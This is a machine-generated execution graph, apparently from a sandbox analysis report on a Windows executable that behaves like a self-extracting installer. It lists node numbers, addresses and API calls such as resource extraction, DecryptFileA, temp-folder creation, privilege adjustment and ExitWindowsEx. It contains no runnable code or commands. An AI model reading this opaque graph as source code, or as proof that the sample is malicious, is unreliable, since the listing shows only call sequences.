                                                                        execution_graph 3128 f36ef0 3129 f36f2d 3128->3129 3131 f36f02 3128->3131 3130 f36f27 ?terminate@ 3130->3129 3131->3129 3131->3130 3132 f334f0 3133 f33504 3132->3133 3134 f335b8 3132->3134 3133->3134 3136 f3351b 3133->3136 3137 f335be GetDesktopWindow 3133->3137 3135 f33526 3134->3135 3138 f33671 EndDialog 3134->3138 3140 f3354f 3136->3140 3141 f3351f 3136->3141 3154 f343d0 6 API calls 3137->3154 3138->3135 3140->3135 3144 f33559 ResetEvent 3140->3144 3141->3135 3143 f3352d TerminateThread EndDialog 3141->3143 3143->3135 3145 f344b9 20 API calls 3144->3145 3149 f33581 3145->3149 3146 f335e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3147 f3361d SetWindowTextA CreateThread 3146->3147 3147->3135 3148 f33646 3147->3148 3151 f344b9 20 API calls 3148->3151 3150 f3359b SetEvent 3149->3150 3152 f3358a SetEvent 3149->3152 3153 f33680 4 API calls 3150->3153 3151->3134 3152->3135 3153->3134 3155 f34463 SetWindowPos 3154->3155 3157 f36ce0 4 API calls 3155->3157 3158 f335d6 3157->3158 3158->3146 3158->3147 3159 f369b0 3160 f369b5 3159->3160 3168 f36fbe GetModuleHandleW 3160->3168 3162 f369c1 __set_app_type __p__fmode __p__commode 3163 f369f9 3162->3163 3164 f36a02 __setusermatherr 3163->3164 3165 f36a0e 3163->3165 3164->3165 3170 f371ef _controlfp 3165->3170 3167 f36a13 3169 f36fcf 3168->3169 3169->3162 3170->3167 3171 f37270 _except_handler4_common 2196 f36a60 2213 f37155 2196->2213 2198 f36a65 2199 f36a76 GetStartupInfoW 2198->2199 2200 f36a93 2199->2200 2201 f36aa8 2200->2201 2202 f36aaf Sleep 2200->2202 2203 f36ac7 _amsg_exit 2201->2203 2205 f36ad1 2201->2205 2202->2200 2203->2205 2204 f36b13 _initterm 2208 f36b2e __IsNonwritableInCurrentImage 2204->2208 2205->2204 2207 f36af4 2205->2207 2205->2208 2206 f36bd6 _ismbblead 2206->2208 2208->2206 2210 f36c1e 2208->2210 2211 f36bbe exit 2208->2211 2218 f32bfb GetVersion 2208->2218 2210->2207 2212 f36c27 _cexit 2210->2212 2211->2208 2212->2207 2214 f3717a 2213->2214 2215 f3717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2213->2215 2214->2215 2216 f371e2 2214->2216 2217 f371cd 2215->2217 2216->2198 2217->2216 2219 f32c50 2218->2219 2220 f32c0f 2218->2220 2235 f32caa memset memset memset 2219->2235 2220->2219 2222 f32c13 GetModuleHandleW 2220->2222 2222->2219 2224 f32c22 GetProcAddress 2222->2224 2224->2219 2232 f32c34 2224->2232 2225 f32c8e 2227 f32c97 CloseHandle 2225->2227 2228 f32c9e 2225->2228 2227->2228 2228->2208 2232->2219 2233 f32c89 2330 f31f90 2233->2330 2347 f3468f FindResourceA SizeofResource 2235->2347 2238 f32e30 2241 f344b9 20 API calls 2238->2241 2239 f32d2d CreateEventA SetEvent 2240 f3468f 7 API calls 2239->2240 2242 f32d57 2240->2242 2243 f32f06 2241->2243 2244 f32d5b 2242->2244 2245 f32d7d 2242->2245 2352 f36ce0 2243->2352 2357 f344b9 2244->2357 2247 f32e1f 2245->2247 2251 f3468f 7 API calls 2245->2251 2386 f35c9e 2247->2386 2249 f32d6e 2249->2243 2253 f32d9f 2251->2253 2252 f32c62 2252->2225 2276 f32f1d 2252->2276 2253->2244 2255 f32da3 CreateMutexA 2253->2255 2255->2247 2259 f32dbd GetLastError 2255->2259 2256 f32e3a 2257 f32e43 2256->2257 2258 f32e52 FindResourceA 2256->2258 2412 f32390 2257->2412 2262 f32e64 LoadResource 2258->2262 2263 f32e6e 2258->2263 2259->2247 2261 f32dca 2259->2261 2264 f32dd5 2261->2264 2265 f32dea 2261->2265 2262->2263 2263->2249 2427 f336ee GetVersionExA 2263->2427 2266 f344b9 20 API calls 2264->2266 2267 f344b9 20 API calls 2265->2267 2268 f32de8 2266->2268 2269 f32dff 2267->2269 2271 f32e04 CloseHandle 2268->2271 2269->2247 2269->2271 2271->2243 2277 f32f3f 2276->2277 2278 f32f6c 2276->2278 2279 f32f5f 2277->2279 2551 f351e5 2277->2551 2571 f35164 2278->2571 2704 f33a3f 2279->2704 2281 f32f71 2313 f33041 2281->2313 2586 f355a0 2281->2586 2288 f36ce0 4 API calls 2290 f32c6b 2288->2290 2289 f32f86 GetSystemDirectoryA 2291 f3658a CharPrevA 2289->2291 2317 f352b6 2290->2317 2292 f32fab LoadLibraryA 2291->2292 2293 f32fc0 GetProcAddress 2292->2293 2294 f32ff7 FreeLibrary 2292->2294 2293->2294 2295 f32fd6 DecryptFileA 2293->2295 2296 f33017 SetCurrentDirectoryA 2294->2296 2297 f33006 2294->2297 2295->2294 2306 f32ff0 2295->2306 2298 f33026 2296->2298 2299 f33054 2296->2299 2297->2296 2636 f3621e GetWindowsDirectoryA 2297->2636 2300 f344b9 20 API calls 2298->2300 2311 f33061 2299->2311 2647 f33b26 2299->2647 2305 f33037 2300->2305 2303 f3307a 2309 f33098 2303->2309 2667 f33ba2 2303->2667 2723 f36285 GetLastError 2305->2723 2306->2294 2309->2313 2315 f330af 2309->2315 2311->2303 2311->2313 2656 f3256d 2311->2656 2313->2288 2725 f34169 2315->2725 2318 f352d6 2317->2318 2326 f35316 2317->2326 2319 f35300 LocalFree LocalFree 2318->2319 2322 f352eb SetFileAttributesA DeleteFileA 2318->2322 2319->2318 2319->2326 2320 f35374 2321 f3538c 2320->2321 3058 f31fe1 2320->3058 2323 f36ce0 4 API calls 2321->2323 2322->2319 2325 f32c72 2323->2325 2325->2225 2325->2233 2326->2320 2327 f3535e SetCurrentDirectoryA 2326->2327 2328 f365e8 4 API calls 2326->2328 2329 f32390 13 API calls 2327->2329 2328->2327 2329->2320 2331 f31f9f 2330->2331 2332 f31f9a 2330->2332 2334 f31fc0 2331->2334 2335 f344b9 20 API calls 2331->2335 2338 f31fd9 2331->2338 2333 f31ea7 15 API calls 2332->2333 2333->2331 2336 f31ee2 GetCurrentProcess OpenProcessToken 2334->2336 2337 f31fcf ExitWindowsEx 2334->2337 2334->2338 2335->2334 2340 f31f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2336->2340 2341 f31f0e 2336->2341 2337->2338 2338->2225 2340->2341 2342 f31f6b ExitWindowsEx 2340->2342 2344 f344b9 20 API calls 2341->2344 2342->2341 2343 f31f1f 2342->2343 2345 f36ce0 4 API calls 2343->2345 2344->2343 2346 f31f8c 2345->2346 2346->2225 2348 f346b6 2347->2348 2349 f32d1a 2347->2349 2348->2349 2350 f346be FindResourceA LoadResource LockResource 2348->2350 2349->2238 2349->2239 2350->2349 2351 f346df memcpy_s FreeResource 2350->2351 2351->2349 2353 f36ceb 2352->2353 2354 f36ce8 2352->2354 2469 f36cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2353->2469 2354->2252 2356 f36e26 2356->2252 2358 f3455a 2357->2358 2359 f344fe LoadStringA 2357->2359 2363 f36ce0 4 API calls 2358->2363 2360 f34562 2359->2360 2361 f34527 2359->2361 2367 f345c9 2360->2367 2373 f3457e 2360->2373 2470 f3681f 2361->2470 2365 f34689 2363->2365 2365->2249 2366 f34536 MessageBoxA 2366->2358 2369 f34607 LocalAlloc 2367->2369 2370 f345cd LocalAlloc 2367->2370 2369->2358 2382 f345c4 2369->2382 2370->2358 2375 f345f3 2370->2375 2373->2373 2374 f34596 LocalAlloc 2373->2374 2374->2358 2377 f345af 2374->2377 2378 f3171e _vsnprintf 2375->2378 2376 f3462d MessageBeep 2379 f3681f 10 API calls 2376->2379 2487 f3171e 2377->2487 2378->2382 2380 f3463b 2379->2380 2383 f34645 MessageBoxA LocalFree 2380->2383 2384 f367c9 EnumResourceLanguagesA 2380->2384 2382->2376 2383->2358 2384->2383 2393 f35e17 2386->2393 2396 f35cc3 2386->2396 2387 f35dd0 2391 f35dec GetModuleFileNameA 2387->2391 2387->2393 2388 f36ce0 4 API calls 2390 f32e2c 2388->2390 2389 f35ced CharNextA 2389->2396 2390->2238 2390->2256 2392 f35e0a 2391->2392 2391->2393 2497 f366c8 2392->2497 2393->2388 2395 f36218 2506 f36e2a 2395->2506 2396->2387 2396->2389 2396->2393 2396->2395 2399 f35e36 CharUpperA 2396->2399 2405 f35f9f CharUpperA 2396->2405 2406 f36003 CharUpperA 2396->2406 2407 f35f59 CompareStringA 2396->2407 2408 f35edc CharUpperA 2396->2408 2409 f360a2 CharUpperA 2396->2409 2411 f3667f IsDBCSLeadByte CharNextA 2396->2411 2502 f3658a 2396->2502 2399->2396 2400 f361d0 2399->2400 2401 f344b9 20 API calls 2400->2401 2402 f361e7 2401->2402 2403 f361f0 CloseHandle 2402->2403 2404 f361f7 ExitProcess 2402->2404 2403->2404 2405->2396 2406->2396 2407->2396 2408->2396 2409->2396 2411->2396 2413 f324cb 2412->2413 2416 f323b9 2412->2416 2414 f36ce0 4 API calls 2413->2414 2415 f324dc 2414->2415 2415->2249 2416->2413 2417 f323e9 FindFirstFileA 2416->2417 2417->2413 2422 f32407 2417->2422 2418 f32421 lstrcmpA 2420 f32431 lstrcmpA 2418->2420 2421 f324a9 FindNextFileA 2418->2421 2419 f32479 2423 f32488 SetFileAttributesA DeleteFileA 2419->2423 2420->2421 2420->2422 2421->2422 2424 f324bd FindClose RemoveDirectoryA 2421->2424 2422->2418 2422->2419 2422->2421 2425 f3658a CharPrevA 2422->2425 2426 f32390 5 API calls 2422->2426 2423->2421 2424->2413 2425->2422 2426->2422 2428 f3372d 2427->2428 2432 f33737 2427->2432 2429 f344b9 20 API calls 2428->2429 2441 f339fc 2428->2441 2429->2441 2430 f36ce0 4 API calls 2431 f32e92 2430->2431 2431->2243 2431->2249 2442 f318a3 2431->2442 2432->2428 2434 f338a4 2432->2434 2432->2441 2513 f328e8 2432->2513 2434->2428 2435 f339c1 MessageBeep 2434->2435 2434->2441 2436 f3681f 10 API calls 2435->2436 2437 f339ce 2436->2437 2438 f339d8 MessageBoxA 2437->2438 2439 f367c9 EnumResourceLanguagesA 2437->2439 2438->2441 2439->2438 2441->2430 2443 f318d5 2442->2443 2450 f319b8 2442->2450 2542 f317ee LoadLibraryA 2443->2542 2445 f36ce0 4 API calls 2447 f319d5 2445->2447 2447->2249 2462 f36517 FindResourceA 2447->2462 2448 f318e5 GetCurrentProcess OpenProcessToken 2449 f31900 GetTokenInformation 2448->2449 2448->2450 2451 f319aa CloseHandle 2449->2451 2452 f31918 GetLastError 2449->2452 2450->2445 2451->2450 2452->2451 2453 f31927 LocalAlloc 2452->2453 2454 f319a9 2453->2454 2455 f31938 GetTokenInformation 2453->2455 2454->2451 2456 f319a2 LocalFree 2455->2456 2457 f3194e AllocateAndInitializeSid 2455->2457 2456->2454 2457->2456 2460 f3196e 2457->2460 2458 f31999 FreeSid 2458->2456 2459 f31975 EqualSid 2459->2460 2461 f3198c 2459->2461 2460->2458 2460->2459 2460->2461 2461->2458 2463 f36536 LoadResource 2462->2463 2464 f3656b 2462->2464 2463->2464 2466 f36544 DialogBoxIndirectParamA FreeResource 2463->2466 2465 f344b9 20 API calls 2464->2465 2467 f3657c 2465->2467 2466->2464 2466->2467 2467->2249 2469->2356 2471 f36857 GetVersionExA 2470->2471 2480 f3691a 2470->2480 2473 f3687c 2471->2473 2471->2480 2472 f36ce0 4 API calls 2474 f3452c 2472->2474 2475 f368a5 GetSystemMetrics 2473->2475 2473->2480 2474->2366 2481 f367c9 2474->2481 2476 f368b5 RegOpenKeyExA 2475->2476 2475->2480 2477 f368d6 RegQueryValueExA RegCloseKey 2476->2477 2476->2480 2478 f3690c 2477->2478 2477->2480 2491 f366f9 2478->2491 2480->2472 2482 f367e2 2481->2482 2485 f36803 2481->2485 2495 f36793 EnumResourceLanguagesA 2482->2495 2484 f367f5 2484->2485 2496 f36793 EnumResourceLanguagesA 2484->2496 2485->2366 2488 f3172d 2487->2488 2489 f3173d _vsnprintf 2488->2489 2490 f3175d 2488->2490 2489->2490 2490->2382 2492 f3670f 2491->2492 2493 f36740 CharNextA 2492->2493 2494 f3674b 2492->2494 2493->2492 2494->2480 2495->2484 2496->2485 2498 f366d5 2497->2498 2499 f366f3 2498->2499 2501 f366e5 CharNextA 2498->2501 2509 f36648 2498->2509 2499->2393 2501->2498 2503 f3659b 2502->2503 2503->2503 2504 f365b8 CharPrevA 2503->2504 2505 f365ab 2503->2505 2504->2505 2505->2396 2512 f36cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2506->2512 2508 f3621d 2510 f36668 2509->2510 2511 f3665d IsDBCSLeadByte 2509->2511 2510->2498 2511->2510 2512->2508 2514 f32a62 2513->2514 2520 f3290d 2513->2520 2515 f32a75 2514->2515 2516 f32a6e GlobalFree 2514->2516 2515->2434 2516->2515 2518 f32955 GlobalAlloc 2518->2514 2519 f32968 GlobalLock 2518->2519 2519->2514 2519->2520 2520->2514 2520->2518 2521 f32a20 GlobalUnlock 2520->2521 2522 f32a80 GlobalUnlock 2520->2522 2523 f32773 2520->2523 2521->2520 2522->2514 2524 f327a3 CharUpperA CharNextA CharNextA 2523->2524 2525 f328b2 2523->2525 2526 f328b7 GetSystemDirectoryA 2524->2526 2527 f327db 2524->2527 2525->2526 2529 f328bf 2526->2529 2528 f328a8 GetWindowsDirectoryA 2527->2528 2532 f327e3 2527->2532 2528->2529 2530 f328d2 2529->2530 2533 f3658a CharPrevA 2529->2533 2531 f36ce0 4 API calls 2530->2531 2534 f328e2 2531->2534 2535 f3658a CharPrevA 2532->2535 2533->2530 2534->2520 2536 f32810 RegOpenKeyExA 2535->2536 2536->2529 2537 f32837 RegQueryValueExA 2536->2537 2538 f3289a RegCloseKey 2537->2538 2539 f3285c 2537->2539 2538->2529 2540 f32867 ExpandEnvironmentStringsA 2539->2540 2541 f3287a 2539->2541 2540->2541 2541->2538 2543 f31890 2542->2543 2544 f31826 GetProcAddress 2542->2544 2545 f36ce0 4 API calls 2543->2545 2546 f31889 FreeLibrary 2544->2546 2547 f31839 AllocateAndInitializeSid 2544->2547 2548 f3189f 2545->2548 2546->2543 2547->2546 2550 f3185f FreeSid 2547->2550 2548->2448 2548->2450 2550->2546 2552 f3468f 7 API calls 2551->2552 2553 f351f9 LocalAlloc 2552->2553 2554 f3522d 2553->2554 2555 f3520d 2553->2555 2557 f3468f 7 API calls 2554->2557 2556 f344b9 20 API calls 2555->2556 2558 f3521e 2556->2558 2559 f3523a 2557->2559 2560 f36285 GetLastError 2558->2560 2561 f35262 lstrcmpA 2559->2561 2562 f3523e 2559->2562 2570 f35223 2560->2570 2564 f35272 LocalFree 2561->2564 2565 f3527e 2561->2565 2563 f344b9 20 API calls 2562->2563 2567 f3524f LocalFree 2563->2567 2566 f32f4d 2564->2566 2568 f344b9 20 API calls 2565->2568 2566->2278 2566->2279 2566->2313 2567->2566 2569 f35290 LocalFree 2568->2569 2569->2570 2570->2566 2572 f3468f 7 API calls 2571->2572 2573 f35175 2572->2573 2574 f3517a 2573->2574 2575 f351af 2573->2575 2577 f344b9 20 API calls 2574->2577 2576 f3468f 7 API calls 2575->2576 2578 f351c0 2576->2578 2579 f3518d 2577->2579 2738 f36298 2578->2738 2579->2281 2583 f351e1 2583->2281 2584 f351ce 2585 f344b9 20 API calls 2584->2585 2585->2579 2587 f3468f 7 API calls 2586->2587 2588 f355c7 LocalAlloc 2587->2588 2589 f355db 2588->2589 2590 f355fd 2588->2590 2592 f344b9 20 API calls 2589->2592 2591 f3468f 7 API calls 2590->2591 2593 f3560a 2591->2593 2594 f355ec 2592->2594 2595 f35632 lstrcmpA 2593->2595 2596 f3560e 2593->2596 2597 f36285 GetLastError 2594->2597 2599 f35645 2595->2599 2600 f3564b LocalFree 2595->2600 2598 f344b9 20 API calls 2596->2598 2619 f355f1 2597->2619 2601 f3561f LocalFree 2598->2601 2599->2600 2602 f35696 2600->2602 2603 f3565b 2600->2603 2614 f355f6 2601->2614 2604 f3589f 2602->2604 2607 f356ae GetTempPathA 2602->2607 2610 f35467 49 API calls 2603->2610 2605 f36517 24 API calls 2604->2605 2605->2614 2606 f36ce0 4 API calls 2608 f32f7e 2606->2608 2609 f356c3 2607->2609 2623 f356eb 2607->2623 2608->2289 2608->2313 2750 f35467 2609->2750 2611 f35678 2610->2611 2613 f35680 2611->2613 2611->2614 2616 f344b9 20 API calls 2613->2616 2614->2606 2616->2619 2617 f35717 GetDriveTypeA 2620 f35730 GetFileAttributesA 2617->2620 2634 f3572b 2617->2634 2618 f3586c GetWindowsDirectoryA 2784 f3597d GetCurrentDirectoryA SetCurrentDirectoryA 2618->2784 2619->2614 2620->2634 2623->2614 2623->2617 2623->2618 2625 f3597d 34 API calls 2625->2634 2626 f35467 49 API calls 2626->2623 2627 f32630 21 API calls 2627->2634 2629 f357c1 GetWindowsDirectoryA 2629->2634 2630 f3658a CharPrevA 2631 f357e8 GetFileAttributesA 2630->2631 2632 f357fa CreateDirectoryA 2631->2632 2631->2634 2632->2634 2633 f35827 SetFileAttributesA 2633->2634 2634->2614 2634->2617 2634->2618 2634->2620 2634->2625 2634->2627 2634->2629 2634->2630 2634->2633 2635 f35467 49 API calls 2634->2635 2780 f36952 2634->2780 2635->2634 2637 f36249 2636->2637 2638 f36268 2636->2638 2640 f344b9 20 API calls 2637->2640 2639 f3597d 34 API calls 2638->2639 2641 f36277 2639->2641 2642 f3625a 2640->2642 2644 f36ce0 4 API calls 2641->2644 2643 f36285 GetLastError 2642->2643 2645 f3625f 2643->2645 2646 f33013 2644->2646 2645->2641 2646->2296 2646->2313 2649 f33b2d 2647->2649 2648 f33b72 2851 f34fe0 2648->2851 2649->2648 2650 f33b53 2649->2650 2652 f36517 24 API calls 2650->2652 2653 f33b70 2652->2653 2654 f36298 10 API calls 2653->2654 2655 f33b7b 2653->2655 2654->2655 2655->2311 2657 f32583 2656->2657 2658 f32622 2656->2658 2660 f3258b 2657->2660 2661 f325e8 RegOpenKeyExA 2657->2661 2905 f324e0 GetWindowsDirectoryA 2658->2905 2663 f325e3 2660->2663 2665 f3259b RegOpenKeyExA 2660->2665 2662 f32609 RegQueryInfoKeyA 2661->2662 2661->2663 2664 f325d1 RegCloseKey 2662->2664 2663->2303 2664->2663 2665->2663 2666 f325bc RegQueryValueExA 2665->2666 2666->2664 2668 f33bdb 2667->2668 2674 f33bec 2667->2674 2670 f3468f 7 API calls 2668->2670 2669 f33c03 memset 2669->2674 2670->2674 2671 f33d13 2672 f344b9 20 API calls 2671->2672 2700 f33d26 2672->2700 2674->2669 2674->2671 2677 f33d7b CompareStringA 2674->2677 2678 f33fd7 2674->2678 2679 f33f4d 2674->2679 2680 f33fab 2674->2680 2686 f3468f 7 API calls 2674->2686 2687 f33f46 LocalFree 2674->2687 2688 f33f1e LocalFree 2674->2688 2690 f33cc7 CompareStringA 2674->2690 2701 f33e10 2674->2701 2913 f31ae8 2674->2913 2953 f3202a memset memset RegCreateKeyExA 2674->2953 2979 f33fef 2674->2979 2675 f36ce0 4 API calls 2676 f33f60 2675->2676 2676->2309 2677->2674 2677->2678 2678->2679 3003 f32267 2678->3003 2679->2675 2683 f344b9 20 API calls 2680->2683 2685 f33fbe LocalFree 2683->2685 2685->2679 2686->2674 2687->2679 2688->2674 2688->2678 2690->2674 2691 f33f92 2694 f344b9 20 API calls 2691->2694 2692 f33e1f GetProcAddress 2693 f33f64 2692->2693 2692->2701 2695 f344b9 20 API calls 2693->2695 2696 f33fa9 2694->2696 2697 f33f75 FreeLibrary 2695->2697 2698 f33f7c LocalFree 2696->2698 2697->2698 2699 f36285 GetLastError 2698->2699 2699->2700 2700->2679 2701->2691 2701->2692 2702 f33f40 FreeLibrary 2701->2702 2703 f33eff FreeLibrary 2701->2703 2993 f36495 2701->2993 2702->2687 2703->2688 2705 f3468f 7 API calls 2704->2705 2706 f33a55 LocalAlloc 2705->2706 2707 f33a8e 2706->2707 2708 f33a6c 2706->2708 2709 f3468f 7 API calls 2707->2709 2710 f344b9 20 API calls 2708->2710 2711 f33a98 2709->2711 2712 f33a7d 2710->2712 2713 f33ac5 lstrcmpA 2711->2713 2714 f33a9c 2711->2714 2715 f36285 GetLastError 2712->2715 2717 f33ada 2713->2717 2718 f33b0d LocalFree 2713->2718 2716 f344b9 20 API calls 2714->2716 2721 f32f64 2715->2721 2719 f33aad LocalFree 2716->2719 2720 f36517 24 API calls 2717->2720 2718->2721 2719->2721 2722 f33aec LocalFree 2720->2722 2721->2278 2721->2313 2722->2721 2724 f3303c 2723->2724 2724->2313 2726 f3468f 7 API calls 2725->2726 2727 f3417d LocalAlloc 2726->2727 2728 f34195 2727->2728 2729 f341a8 2727->2729 2731 f344b9 20 API calls 2728->2731 2730 f3468f 7 API calls 2729->2730 2732 f341b5 2730->2732 2733 f341a6 2731->2733 2734 f341c5 lstrcmpA 2732->2734 2735 f341b9 2732->2735 2733->2313 2734->2735 2736 f341e6 LocalFree 2734->2736 2737 f344b9 20 API calls 2735->2737 2736->2733 2737->2736 2739 f3171e _vsnprintf 2738->2739 2749 f362c9 FindResourceA 2739->2749 2741 f36353 2743 f36ce0 4 API calls 2741->2743 2742 f362cb LoadResource LockResource 2742->2741 2745 f362e0 2742->2745 2744 f351ca 2743->2744 2744->2583 2744->2584 2746 f36355 FreeResource 2745->2746 2747 f3631b FreeResource 2745->2747 2746->2741 2748 f3171e _vsnprintf 2747->2748 2748->2749 2749->2741 2749->2742 2751 f3548a 2750->2751 2768 f3551a 2750->2768 2811 f353a1 2751->2811 2753 f35581 2757 f36ce0 4 API calls 2753->2757 2756 f35495 2756->2753 2760 f354c2 GetSystemInfo 2756->2760 2761 f3550c 2756->2761 2762 f3559a 2757->2762 2758 f3553b CreateDirectoryA 2763 f35577 2758->2763 2764 f35547 2758->2764 2759 f3554d 2759->2753 2767 f3597d 34 API calls 2759->2767 2772 f354da 2760->2772 2765 f3658a CharPrevA 2761->2765 2762->2614 2774 f32630 GetWindowsDirectoryA 2762->2774 2766 f36285 GetLastError 2763->2766 2764->2759 2765->2768 2769 f3557c 2766->2769 2770 f3555c 2767->2770 2822 f358c8 2768->2822 2769->2753 2770->2753 2773 f35568 RemoveDirectoryA 2770->2773 2771 f3658a CharPrevA 2771->2761 2772->2761 2772->2771 2773->2753 2775 f3266f 2774->2775 2776 f3265e 2774->2776 2778 f36ce0 4 API calls 2775->2778 2777 f344b9 20 API calls 2776->2777 2777->2775 2779 f32687 2778->2779 2779->2623 2779->2626 2781 f369a1 2780->2781 2782 f3696e GetDiskFreeSpaceA 2780->2782 2781->2634 2782->2781 2783 f36989 MulDiv 2782->2783 2783->2781 2785 f359bb 2784->2785 2786 f359dd GetDiskFreeSpaceA 2784->2786 2787 f344b9 20 API calls 2785->2787 2788 f35ba1 memset 2786->2788 2789 f35a21 MulDiv 2786->2789 2790 f359cc 2787->2790 2791 f36285 GetLastError 2788->2791 2789->2788 2792 f35a50 GetVolumeInformationA 2789->2792 2793 f36285 GetLastError 2790->2793 2794 f35bbc GetLastError FormatMessageA 2791->2794 2795 f35ab5 SetCurrentDirectoryA 2792->2795 2796 f35a6e memset 2792->2796 2797 f359d1 2793->2797 2798 f35be3 2794->2798 2805 f35acc 2795->2805 2799 f36285 GetLastError 2796->2799 2810 f35b94 2797->2810 2800 f344b9 20 API calls 2798->2800 2801 f35a89 GetLastError FormatMessageA 2799->2801 2803 f35bf5 SetCurrentDirectoryA 2800->2803 2801->2798 2802 f36ce0 4 API calls 2804 f35c11 2802->2804 2803->2810 2804->2623 2806 f35b0a 2805->2806 2808 f35b20 2805->2808 2807 f344b9 20 API calls 2806->2807 2807->2797 2808->2810 2834 f3268b 2808->2834 2810->2802 2813 f353bf 2811->2813 2812 f3171e _vsnprintf 2812->2813 2813->2812 2814 f3658a CharPrevA 2813->2814 2817 f35415 GetTempFileNameA 2813->2817 2815 f353fa RemoveDirectoryA GetFileAttributesA 2814->2815 2815->2813 2816 f3544f CreateDirectoryA 2815->2816 2816->2817 2818 f3543a 2816->2818 2817->2818 2819 f35429 DeleteFileA CreateDirectoryA 2817->2819 2820 f36ce0 4 API calls 2818->2820 2819->2818 2821 f35449 2820->2821 2821->2756 2823 f358d8 2822->2823 2823->2823 2824 f358df LocalAlloc 2823->2824 2825 f358f3 2824->2825 2826 f35919 2824->2826 2827 f344b9 20 API calls 2825->2827 2829 f3658a CharPrevA 2826->2829 2833 f35906 2827->2833 2828 f36285 GetLastError 2831 f35534 2828->2831 2830 f35931 CreateFileA LocalFree 2829->2830 2832 f3595b CloseHandle GetFileAttributesA 2830->2832 2830->2833 2831->2758 2831->2759 2832->2833 2833->2828 2833->2831 2835 f326e5 2834->2835 2836 f326b9 2834->2836 2838 f326ea 2835->2838 2839 f3271f 2835->2839 2837 f3171e _vsnprintf 2836->2837 2841 f326cc 2837->2841 2842 f3171e _vsnprintf 2838->2842 2840 f326e3 2839->2840 2843 f3171e _vsnprintf 2839->2843 2844 f36ce0 4 API calls 2840->2844 2845 f344b9 20 API calls 2841->2845 2846 f326fd 2842->2846 2848 f32735 2843->2848 2849 f3276d 2844->2849 2845->2840 2847 f344b9 20 API calls 2846->2847 2847->2840 2850 f344b9 20 API calls 2848->2850 2849->2810 2850->2840 2852 f3468f 7 API calls 2851->2852 2853 f34ff5 FindResourceA LoadResource LockResource 2852->2853 2854 f3515f 2853->2854 2855 f35020 2853->2855 2854->2653 2856 f35057 2855->2856 2857 f35029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2855->2857 2873 f34efd 2856->2873 2857->2856 2860 f35060 2862 f344b9 20 API calls 2860->2862 2861 f3507c 2863 f35106 2861->2863 2864 f350e8 2861->2864 2869 f35075 2862->2869 2865 f35110 FreeResource 2863->2865 2866 f3511d 2863->2866 2867 f344b9 20 API calls 2864->2867 2865->2866 2868 f3513a 2866->2868 2870 f35129 2866->2870 2867->2869 2868->2854 2872 f3514c SendMessageA 2868->2872 2869->2863 2871 f344b9 20 API calls 2870->2871 2871->2868 2872->2854 2874 f34f4a 2873->2874 2875 f34fa1 2874->2875 2881 f34980 2874->2881 2877 f36ce0 4 API calls 2875->2877 2878 f34fc6 2877->2878 2878->2860 2878->2861 2882 f34990 2881->2882 2883 f349c2 lstrcmpA 2882->2883 2884 f349a5 2882->2884 2886 f34a0e 2883->2886 2888 f349ba 2883->2888 2885 f344b9 20 API calls 2884->2885 2885->2888 2886->2888 2892 f3487a 2886->2892 2888->2875 2889 f34b60 2888->2889 2890 f34b92 FindCloseChangeNotification 2889->2890 2891 f34b76 2889->2891 2890->2891 2891->2875 2893 f348a2 CreateFileA 2892->2893 2895 f348e9 2893->2895 2896 f34908 2893->2896 2895->2896 2897 f348ee 2895->2897 2896->2888 2900 f3490c 2897->2900 2901 f348f5 CreateFileA 2900->2901 2903 f34917 2900->2903 2901->2896 2902 f34962 CharNextA 2902->2903 2903->2901 2903->2902 2904 f34953 CreateDirectoryA 2903->2904 2904->2902 2906 f32510 2905->2906 2907 f3255b 2905->2907 2908 f3658a CharPrevA 2906->2908 2909 f36ce0 4 API calls 2907->2909 2910 f32522 WritePrivateProfileStringA _lopen 2908->2910 2911 f32569 2909->2911 2910->2907 2912 f32548 _llseek _lclose 2910->2912 2911->2663 2912->2907 2914 f31b25 2913->2914 3017 f31a84 2914->3017 2916 f31b57 2917 f3658a CharPrevA 2916->2917 2918 f31b8c 2916->2918 2917->2918 2919 f366c8 2 API calls 2918->2919 2920 f31bd1 2919->2920 2921 f31d73 2920->2921 2922 f31bd9 CompareStringA 2920->2922 2923 f366c8 2 API calls 2921->2923 2922->2921 2924 f31bf7 GetFileAttributesA 2922->2924 2927 f31d7d 2923->2927 2925 f31d53 2924->2925 2926 f31c0d 2924->2926 2933 f344b9 20 API calls 2925->2933 2926->2925 2930 f31a84 2 API calls 2926->2930 2928 f31d81 CompareStringA 2927->2928 2929 f31df8 LocalAlloc 2927->2929 2928->2929 2931 f31d9b LocalAlloc 2928->2931 2929->2925 2932 f31e0b GetFileAttributesA 2929->2932 2936 f31c31 2930->2936 2931->2925 2945 f31de1 2931->2945 2944 f31e1d 2932->2944 2950 f31e45 2932->2950 2951 f31cc2 2933->2951 2934 f31c50 LocalAlloc 2934->2925 2937 f31c67 GetPrivateProfileIntA GetPrivateProfileStringA 2934->2937 2935 f31e89 2938 f36ce0 4 API calls 2935->2938 2936->2934 2939 f31a84 2 API calls 2936->2939 2946 f31cf8 2937->2946 2937->2951 2943 f31ea1 2938->2943 2939->2934 2943->2674 2944->2950 2949 f3171e _vsnprintf 2945->2949 2947 f31d23 2946->2947 2948 f31d09 GetShortPathNameA 2946->2948 2952 f3171e _vsnprintf 2947->2952 2948->2947 2949->2951 3023 f32aac 2950->3023 2951->2935 2952->2951 2954 f3209a 2953->2954 2963 f32256 2953->2963 2957 f3171e _vsnprintf 2954->2957 2959 f320dc 2954->2959 2955 f36ce0 4 API calls 2956 f32263 2955->2956 2956->2674 2958 f320af RegQueryValueExA 2957->2958 2958->2954 2958->2959 2960 f320e4 RegCloseKey 2959->2960 2961 f320fb GetSystemDirectoryA 2959->2961 2960->2963 2962 f3658a CharPrevA 2961->2962 2964 f3211b LoadLibraryA 2962->2964 2963->2955 2965 f32179 GetModuleFileNameA 2964->2965 2966 f3212e GetProcAddress FreeLibrary 2964->2966 2968 f321de RegCloseKey 2965->2968 2971 f32177 2965->2971 2966->2965 2967 f3214e GetSystemDirectoryA 2966->2967 2969 f32165 2967->2969 2967->2971 2968->2963 2970 f3658a CharPrevA 2969->2970 2970->2971 2971->2971 2972 f321b7 LocalAlloc 2971->2972 2973 f321cd 2972->2973 2974 f321ec 2972->2974 